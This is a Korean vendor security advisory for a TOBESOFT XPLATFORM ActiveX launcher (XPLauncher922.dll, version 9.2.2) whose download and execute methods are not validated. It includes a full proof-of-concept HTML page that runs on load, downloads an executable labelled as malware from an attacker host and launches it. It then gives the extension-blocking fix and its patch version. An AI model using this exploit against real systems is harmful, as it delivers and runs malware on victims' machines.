31.보안

31.1보안취약점관련

31.2XPLATFORM보안정책-SendBox

31.2.1보안취약점 지적사항 및 조치방법

지적내용

XPLATFORM ActiveX에서 파일 다운로드 및 실행 메소드에 대한 검증 부재
파일명 : XPLauncher922.dll
CLSID : {A30D5481-7381-4DD9-B0F4-0D1D37449E97} 
버전 : 9.2.2
<HTML>
<HEAD>
<TITLE>Showcase Exploit</TITLE>
<SCRIPT LANGUAGE="JavaScript"> 

function exploit_XPlatForm()
{  
  XLauncher.componentpath = "C:\\Program Files\\TOBESOFT\\XPLATFORM\\9.2.2\\"; 
  //다운로드 대상 폴더
  //    XLauncher.splashimage = "http://[공격자서버]/XPlatform.exe"; //악성코드
  XLauncher.splashimage = "http://172.10.13.51:8080/Service/XPlatform.exe"; //악성코드
  XLauncher.download();
  XLauncher.version = "9.2.2";
  XLauncher.key = "XFShowCase";
  XLauncher.xadl = "http://support.tobesoft.co.kr/Next_JSP/XFShowcase/UI/ShowCase.xadl";
  XLauncher.launch(); //악성코드 교체된 XPlatform 실행
}  
</SCRIPT> 
  
</HEAD>
<BODY onload="exploit_XPlatForm()">
<OBJECT ID="XLauncher" CLASSID="CLSID:A30D5481-7381-4DD9-B0F4-0D1D37449E97"></OBJECT>
</BODY>
</HTML>

조치내용

해당 문제에 대한 조치는 관련 속성에 지정할 수 있는 파일 확장자를 제한함 
(조치방안)
1. XPLauncher 관련 속성 
    - XPLauncher.loadingimage
    - XPLauncher.splashimage
  
2. 조치내용
    - 위 두개의 속성에 대해서 파일 확장자를 제한
    - 대소문자 구분하지 않고 제한
    - 제한하는 파일 확장자(com, exe, bat, cmd, dll)

적용버전

해당 내용은 2018.2.27일자에 패치되었습니다.
즉 XPLaunche 9.2.2.200에 적용